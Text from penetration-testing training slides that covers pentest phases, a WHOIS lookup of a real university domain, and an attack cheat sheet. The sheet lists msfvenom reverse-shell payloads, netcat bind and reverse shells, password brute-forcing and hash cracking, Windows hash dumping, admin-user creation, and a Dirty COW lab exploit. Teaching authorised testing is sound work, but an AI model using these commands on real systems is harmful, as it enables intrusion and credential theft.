Untitled

Razboi cibernetic
Introduction
- Definition of Penetration Testing
- Who needs Penetration Testing?
- Penetration Testing Viewpoints
- Phases of Penetration Testing
- Reconnaissance and Information Gathering
- Network Enumeration and Scanning
- Vulnerability Testing and Exploitation
- Reporting
Penetration Testing
Definition of Penetration Testing:
- A penetration test or pentest is a test evaluating the strengths of all
security controls on the computer system. Penetration tests evaluate
procedural and operational controls as well as technological
controls.
Who needs Penetration Testing
- Banks/Financial Institutions, Government Organizations, Online
Vendors, or any organization processing and storing private
information
- Most certifications require or recommend that penetration tests be
performed on a regular basis to ensure the security of the system.
- PCI Data Security Standard's Section 11.3 requires organizations
to perform application and penetration tests at least once a year.
- HIPAA Security Rule's section 8 of the Administrative Safeguards
requires security process audits, periodic vulnerability analysis and
penetration testing.
Penetration Testing Viewpoints
-External vs. Internal
Penetration Testing can be performed from the viewpoint of an
external attacker or a malicious employee.
- Overt vs. Covert
Penetration Testing can be performed with or without the
knowledge of the IT department of the company being tested.
Phases of Penetration Testing
- Reconnaissance and Information Gathering
- Network Enumeration and Scanning
- Vulnerability Testing and Exploitation
- Reporting
Reconnaissance and Information Gathering
Purpose: To discover as much information about a target
(individual or organization) as possible without actually making
network contact with said target.
Methods:
• Organization info discovery via WHOIS
• Google search
• Website browsing
WHOIS Results for www.clemson.edu
Domain Name: CLEMSON.EDU
Registrant:
Clemson University
340 Computer Ct
Anderson, SC 29625
UNITED STATES
Administrative Contact:
Network Operations Center
Clemson University
340 Computer Court
Anderson, SC 29625
UNITED STATES
(864) 656-4634
noc@clemson.edu
Technical Contact:
Mike S. Marshall
DNS Admin
Clemson University
Clemson University
340 Computer Court
Anderson, SC 29625
UNITED STATES
(864) 247-5381
hubcap@clemson.edu
Name Servers:
EXTNS1.CLEMSON.EDU 130.127.255.252
EXTNS2.CLEMSON.EDU 130.127.255.253
EXTNS3.CLEMSON.EDU 192.42.3.5
Network Enumeration and Scanning
Purpose: To discover existing networks owned by a target as well
as live hosts and services running on those hosts.
Methods:
• Scanning programs that identify live hosts, open ports, services, and other
info (Nmap, autoscan)
• DNS Querying
• Route analysis (traceroute)
Begin Scanning
• Survey the network in any case whether you know the network diagram
or are blind testing
• Scans include all devices on the network, their Operating System, open
ports, and services running
• If feasible, look for open access ports to the network in discreet areas.
• Ideal for placing your own wireless access points
Network Scans
•Try the low hanging fruit
• Check network places and shared drives for unrestricted access.
• Copy machines may have onboard hard drives with file sharing
• Users may know enough to be dangerous sharing folders
NMAP
•Network scanner
•Identifies devices and Operating Systems
•More quiet than pinging devices
•Uses the REQ,ACK,SYN for communications
•Returns open ports and has options for more stealthy operations on
a sensitive network
Nmap Port Scan types
• Scan a single IP nmap 192.168.1.1
• Scan a host nmap www.testhostname.com
• Scan a range of IPs nmap 192.168.1.1-20
• Scan a subnet nmap 192.168.1.0/24
• Scan targets from a text file nmap -iL list-of-ips.txt
• Scan using TCP connect nmap -sT 192.168.1.1
• Scan using TCP SYN scan (default) nmap -sS 192.168.1.1
• Scan UDP ports nmap -sU -p 123,161,162 192.168.1.1
• Scan selected ports - ignore discovery nmap -Pn -F
192.168.1.1
Nmap Port Scan types
Detect OS and Services nmap -A 192.168.1.1
Standard service detection nmap -sV 192.168.1.1
More aggressive Service Detection nmap -sV --versionintensity
5 192.168.1.1
Lighter banner grabbing detection nmap -sV --versionintensity
0 192.168.1.1
Save default output to file nmap -oN outputfile.txt
192.168.1.1
Save results as XML nmap -oX outputfile.xml 192.168.1.1
Save results in a format for grep nmap -oG outputfile.txt
192.168.1.1
Save in all formats nmap -oA outputfile 192.168.1.1
Nmap Results
nmap -sS 127.0.0.1
123
Starting Nmap 4.01 at 2018-07-06 17:23 BST
4 Interesting ports on chaos (127.0.0.1):
5 (The 1668 ports scanned but not shown below are in state: closed)
6 PORT STATE SERVICE
7 21/tcp open ftp
8 22/tcp open ssh
9 631/tcp open ipp
10 6000/tcp open X11
11
12 Nmap finished: 1 IP address (1 host up) scanned in 0.207
13 seconds
Vulnerability Scanners
•Nessus
• Free for personal use
• Linux can use apt-get
• Windows can download
• Requires registration before usage
•openVAS
• Spin off of Nessus
• http://www.openvas.org/
Nessus
•Enumerates vulnerabilities per device
•Web GUI provides easy usage and real-time enumerations
•Works with Metasploit to provide a scan and attempt at known
vulnerabilities
• Requires database for saving Nessus scans
•Use the “Search” in Metasploit to find modules relating to scans to
begin probing
John the Ripper
•Offline password cracker
•Used on SAM dumps, LANMAN, most types of password hashes
• Windows keeps local user account hashes in the Security Accounts Manager (SAM)
database
•Can also be used to generate mangled wordlists for uses with other tools.
• Know the how to write rules in john.conf file
• Output file can be in a txt format
• Remember the john.pots file
Medusa or Hydra
•Online password cracking
•Great for dictionary attacks (wordlists)
•Best if used on known open ports
•Wordlists can be found online and mangled with JTR for more complex
P@55w0rds!
Pointers When Using Tools
•Read any precautionary comments before starting. Some exploits could
cause damage to databases or resources costing your client money
•Try not to use client’s network to do quick research, it could contaminate
results
•Advise IT staff of certain network loading tests and log expectations
•Ask, when in doubt if a critical resource is discovered vulnerable, about
exploiting
•Proof-of-concept may be all that is needed
Finding Public Exploits
• Exploit-DB
• http://www.exploit-db.com/
• Searchsploit
• The exploit-db collection of exploits is mirrored locally on Kali machines. Using the command searchsploit <search
term> you can bring up a listing of exploits. Be aware that the search must be in all lower case.
• Metasploit
• Metasploit has a range of exploits built in and can be searched with the “search” command. You can also grep the
search results with the syntax “grep <grep term> search <search term>”. Filters are also provided to let you narrow
down your search specifically to exploits if desired.
• SecurityFocus
• http://www.securityfocus.com/
• Although in my opinion not as comprehensive as exploit-db you still occasionally turn up a working proof of concept
at security focus that isn’t mirrored elsewhere. In general a good site to check.
• 1337Day
• http://1337day.com/
• I can’t speak for the reliability of the site as I haven’t used it much, however this is another resource when searching
for exploits. Semi-0 day (for want of a better term) exploits are sometimes also sold here before eventually leaking
out to everyone.
Metasploit
•Metasploit is an open source platform
• supports vulnerability research
• exploit development
• creation of custom security tools
•Included in BackTrack distributions
•Recommend intense training to master
•Metasploitable VM download
Metasploit
• List payloads
• msfvenom -l
• Binaries
• Linux
• msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf >
shell.elf
• Windows
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe >
shell.exe
• Mac
• msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho >
shell.macho
• Web Payloads
• PHP
• msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
• cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
• ASP
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp >
shell.asp
• JSP
• msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
• WAR
• msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Metasploit
• Scripting Payloads
• Python
• msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On>
-f raw > shell.py
• Bash
• msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f
raw > shell.sh
• Perl
• msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f
raw > shell.pl
• Shellcode
• For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom
will output code that is able to be cut and pasted in this language for your exploits.
• Linux Based Shellcode
• msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your
Port to Connect On> -f <language>
• Windows Based Shellcode
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your
Port to Connect On> -f <language>
• Mac Based Shellcode
• msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f <language>
Metasploit
• Handlers
• Metasploit handlers can be great at quickly setting up
Metasploit to be in a position to receive your incoming
shells. Handlers should be in the following format.
• use exploit/multi/handler
• set PAYLOAD <Payload name>
• set LHOST <LHOST value>
• set LPORT <LPORT value>
• set ExitOnSession false
• exploit -j -z
• Once the required values are completed the following
command will execute your handler – ‘msfconsole -L -r ‘
What is Happening...
•Known vulnerability occurs in victim
•Related exploit is set in Metasploit
•Options are configured for the victim
•Payloads are viewed and selected
• Payloads are what the attacker wishes to happen
•Exploit occurs causing the victim process to crash
•Payload is triggered
Pushing Greater Limits
•Metasploit offers much more than the scope of this presentation
• Fuzzing protocols like IMAP and TFTP
• Writing fuzzers can become the first step to creating new exploits
• Good for protocols on the network that have no known module
• Password sniffing on the wire
• Creating backdoors to maintain access
Wrapping Up The Audit
•Check for any open activities
•Confer with IT staff that all network activity is normal
•Ensure all documentation is collected
Post-Audit
•Generate documentation of all work performed
• Official audit report to the client
• Should incorporate summaries, details, and exhibits
• Include screenshots and pictures taken
• Describe details of each action and what threat it presents
Presentation
•In most cases, a brief presentation to client and selected staff will be
performed
• Include most significant threats discovered and solutions
• Emphasize the impact of all negative findings to the business
• Include positive notes where security was solid
Post-Audit Report
•Audit report is a confidential document to the client
•It is an official report that will be integrated into reports of other audits
for that client
•Use encryption if delivering by email
•Exercise infosec in all cases regardless of method used for
communications
•Be thorough, use passive writing, use pictures
Vulnerability Testing and Exploitation
Purpose: To check hosts for known vulnerabilities and to see if they
are exploitable, as well as to assess the potential severity of said
vulnerabilities.
Methods:
• Remote vulnerability scanning (Nessus, OpenVAS)
• Active exploitation testing
o Login checking and bruteforcing
o Vulnerability exploitation (Metasploit, Core Impact)
o 0day and exploit discovery (Fuzzing, program analysis)
o Post exploitation techniques to assess severity (permission
levels, backdoors, rootkits, etc)
Reporting
Purpose: To organize and document information found during the
reconnaissance, network scanning, and vulnerability testing phases of
a pentest.
Methods:
• Documentation tools (Dradis)
o Organizes information by hosts, services, identified hazards and
risks, recommendations to fix problems
Connect to a remote system
• Terminal = An interface that provides a display for output and a key board
for input to a shell session .
• Shell = Interpreter that executes commands typed as string
• Console: Actually two types of console we use
• Physical console=The hardware display and keyboard used to interact
with a system
• Virtual console= One of multiple logical consoles that can each support
an independent login session.
• tty(teletype ie terminal). = A terminal is a basically just a user interface
device that uses text for input and output.message.
Spawning a TTY Shell
• Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the
system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will
depend on the system environment and installed packages.
• python -c 'import pty; pty.spawn("/bin/sh")'
• echo os.system('/bin/bash')
• /bin/sh -i
• perl —e 'exec "/bin/sh";'
• perl: exec "/bin/sh";
• ruby: exec "/bin/sh"
• lua: os.execute('/bin/sh')
• (From within IRB)
• exec "/bin/sh"
• (From within vi)
• :!bash
• (From within vi)
• :set shell=/bin/bash:shell
• (From within nmap)
• !sh
Netcat
• Connect to a TCP Port
• nc -nv <IP Address> <Port>
• Listen on a TCP Port
• nc -lvp <port>
• Connect and receive a HTTP Page
• nc -nv <IP Address> 80
• HEAD / HTTP/1.1
• Transferring a File
• nc -lvp 4444 >output.txt # Receiving End
• nc -nv <IP Address> < input.txt # Sending End
• Set up a Netcat Bind Shell (Windows)
• nc -lvp 4444 -e cmd.exe
• nc -nv <IP Address> 4444 # Connect to the shell
• Set up a Netcat Bind Shell (Linux)
• nc -lvp 4444 -e /bin/sh
• nc -nv <IP Address> 4444 # Connect to the shell
• Set up a Netcat Reverse Shell (Windows)
• nc -lvp 443 # Attacker listening for connection
• nc -nv <IP Address> 443 -e cmd.exe
• Set up a Netcat Reverse Shell (Linux)
• nc -lvp 443
• nc -nv <IP Address> 443 -e /bin/sh
• Netcat as a Port Scanner
• nc -z <IP Address> <Port Range in abc - xyz format>
Cracking Network Passwords
(Hydra)
• Basic Syntax
• hydra -l/-L <user name / user list> -p/-P <password / password list>
<protocol://hostname>
• Break Down
• -l/-L : Only one of these is needed. Little l is for nominating a single username,
capital is for a username list
• -p/-P : Only one of these is needed again. Little p for a single password, capital
p for a password list.
• <protocol://hostname> : This specifies the target and protocol. For example
cracking ssh on 192.168.1.1 would be ssh://192.168.1.1, while ftp on 10.1.2.3
would be ftp://10.1.2.3
• Example
• hydra -l bob -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.15 # Cycle
through a wordlist trying to log in as bob over ssh on 192.168.1.1
• hydra -L usernames.txt -p password 192.168.1.1 http-get / -s 80 # Cycle
through a list of usernames and try and log into the router at
http://192.168.1.1:80/ with the password 'password'
Generating Wordlists
• Obtaining a Relevant Password List
• cewl http://netsec.ws/ -d 1 -m 6 -w netsec.txt
• Breaking this down we’ll be crawling netsec.ws and (-d) 1 link layer deep from the main page. The minimum length of words we’re going to be
keeping is 6 characters, and we’re saving the output to a text file netsec.txt. Testing the result we have accumulated a lot of passwords directly
related to netsec.ws and it’s content.
• wc -l netsec.txt
• 1741 netsec.txt
• Building Off a Solid Foundation
• Now we have a solid list of candidate passwords we often want to build off this by mutating the passwords according to particular rules. John the
ripper provides awesome functionality for this with their wordlist rules. They can be viewed and added to in the file located at /etc/john/john.conf
under ‘#Wordlist mode rules’. Some examples are,
• # Try words as they are
• :
• # Lowercase every pure alphanumeric word
• -c >3 !?X l Q
• # Capitalize every pure alphanumeric word
• -c (?a >2 !?X c Q
• # Lowercase and pluralize pure alphabetic words
• <* >2 !?A l p
• # Lowercase pure alphabetic words and append '1'
• <* >2 !?A l $1
• john ---wordlist=netsec.txt --rules --stdout > netsec-mutated.txt
Identifying Hashes (Hash
Identifier)
• Often when you wish to crack a hash you need to identify what
type of has it is so you can successfully configure oclHashcat or
your favorite cracking tool. Hash-identifier is a nifty tool built into
Kali which will allow you to print out the most likely hash format.
• Tool
• hash-identifier
• Usage
• Call the program and paste in your hash
• hash-identifier
• Example
Cracking Hashes (oclHashcat)
• Basic Syntax
• oclHashcat -m <hash type><hash list> <word list> -o <found list> --remove
• Break Down
• -m : signifies the type of hash being attacked. A list of hash types and their
value can be found here –
http://hashcat.net/wiki/doku.php?id=example_hashes
• : a text file containing a list of all the hashes you wish to attack. Can be an
individual hash if you wish.
• : a file containing likely passwords.
• -o : store recovered values in a separate file
• –remove : remove successfully recovered hashes from the original list. Useful
for running the same file against several lists without having to waste time
searching for hashes already broken.
• Example
• oclhashcat -m 500 example500.hash /usr/share/wordlists/rockyou.txt -o
found.txt
Obtaining Windows Passwords
• NT Hashes
• Newer Windows operating systems use the NT hash. In simple terms there is no significant
weakness in this hash that sets it apart from any other cryptographic hash function. Cracking
methods such as brute force, rainbow tables or word lists are required to recover the password
if it’s only stored in the NT format.
• An example of a dumped NTLM hash with only the NT component (as seen on newer systems.
• Administrator:500:NO
PASSWORD*********************:EC054D40119570A46634350291AF0F72:::
• It’s worth noting the “no password” string is variable based on the tool. Others may present
this information as padded zeros, or commonly you may see the string
“AAD3B435B51404EEAAD3B435B51404EE” in place of no password. This signifies that the LM
hash is empty and not stored.
• Location
• The hashes are located in the Windows\System32\config directory using both the SAM and
SYSTEM files. In addition it’s also located in the registry file HKEY_LOCAL_MACHINE\SAM
which cannot be accessed during run time. Finally backup copies can be often found in
Windows\Repair.
Obtaining Windows Passwords
• Tool – PwDump7 – http://www.tarasco.org/security/pwdump_7/
• This tool can be executed on the system machine to recover the system hashes. Simply
download the run the binary with at least administrator account privileges.
• Tool – Windows Credential Editor – http://www.ampliasecurity.com/
• Windows Credentials Editor (WCE) is great for dumping passwords that are in memory.
Personally I typically use it with the -w flag to dump passwords in clear text. This can
often net you passwords that are infeasible to get any other way.
• Tool – Meterpreter
• If you have a meterpreter shell on the system, often you can get the hashes by calling the
hashdump command.
• Method – Recovery Directory
• Occasionally you may not have direct access to the file required, or perhaps even
command line interaction with the victim. An example of this would be a local file
inclusion attack on a web service. In those cases it’s recommended you try and recover
the SYSTEM and SAM directories located in the Windows\Repair directory.
Simple Windows Commands
• Check Who You Are
• echo %USERDOMAIN%\%USERNAME
• whoami
• Check Windows Version
• systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
• Add a User
• net user <username> <password> /add</password></username>
• Add a User to the Administrators Group
• net localgroup administrators <username> /add
• Getting from Administrator to System
• psexec -s cmd.exe
• Getting system with Meterpreter
• getsystem
• (from the meterpreter shell)
• Changing a Users Password
• net user <username> <password>
• View Domain Groups
• net group /domain
• View Members of Domain Group
• net group /domain <Group Name>
Simple Linux Commands
• Requesting a DHCP IP Address
• dhclient <interface></interface>
• Setting a Static IP Address
• ifconfig <interface> <ip address>/<cidr>
• route add default gw <gateway IP Address>
• echo nameserver <nameserver / Gateway IP Address> >
/etc/resolv.conf</nameserver></gateway></cidr></ip></interface>
• Enable service at boot
• update-rc.d <service> enable
• Isolate a particular field (Cutting)
• cat <filename> | cut -d <delimiter for each field> -f <field number, other field numbers> > output.txt
• Find and replace instances in a file (sed)
• cat file.txt | sed -e "s/<instance to find>/<instance to replace it with>/g" > output.txt
• Remove End Characters
• cat file.txt | rev | cut -c<how many characters you want removed+1> | rev > output.txt
• Merge Two Files Side by Side
• paste -d" " <first file> <second file> > <output file>
• Tar all files in a directory
• tar -cvf newtarfile.tar targetdir/
• Grep all files in a directory and subdirectory (print path to found files)
• grep -H -i -r "Search Text" targetdir/
Linux Privilege Escalation Scripts
• LinEnum
• http://www.rebootuser.com/?p=1758
• This tool is great at running through a heap of things you should check on a Linux
system in the post exploit process. This include file permissions, cron jobs if visible,
weak credentials etc. The first thing I run on a newly compromised system.
• LinuxPrivChecker
• http://www.securitysift.com/download/linuxprivchecker.py
• This is a great tool for once again checking a lot of standard things like file
permissions etc. The real gem of this script is the recommended privilege
escalation exploits given at the conclusion of the script. This is a great starting point
for escalation.
• g0tmi1k’s Blog
• http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
• Not so much a script as a resource, g0tmi1k’s blog post here has led to so many
privilege escalations on Linux system’s it’s not funny. Would definitely recommend
trying out everything on this post for enumerating systems.
WEB APPLICATION PENETRATION
WEB APPLICATION PENETRATION
WEB APPLICATION PENETRATION
WEB APPLICATION PENETRATION
Lab – hands on
• Scanning network
• Nmap, nikto, gobuster nmap –sV –sC (ip
address)
• Use the LFI
• Export Base64 pages
• Discover user’s credentials
• Remote connect to services exposed
• Upload a shell
• https://github.com/pentestmonkey/php-reverse-shell
Lab – hands on
Lab – hands on
• https://www.exploit-db.com/exploits/40616/
• gcc cow32.c -o cowroot -pthread 2>/dev/null
• $ python -c ‘import pty; pty.spawn(“/bin/bash”)’
• Deconstructing an ELF File
• This let us know that the program is trying to call the cat command to
view the contents of a file called msg.txt available under the home
directory of a user called mike. Moreover, let’s recall the the file is SUID.
What should we do now?
• There is a popular technique where attackers manage to manipulate the
$PATH bash environmental to escalate their privileges. Imagine what
would happen if we edit the $PATH variable and instead of the default
value we put a new one, a simple dot (.). Whenever a program
(executable) is called, bash will look at the “.” directory for the program
instead of /usr/local/bin, /usr/bin and more. Let’s see what this mean.
Lab – hands on
From what we can see, we have an
ELF 32-bit LSB executable. When
executing the file, we get the
following error:
Lab – hands on
Lab – hands on
Gather experience
• https://www.abatchy.com/2017/02/osc
p-like-vulnhub-vms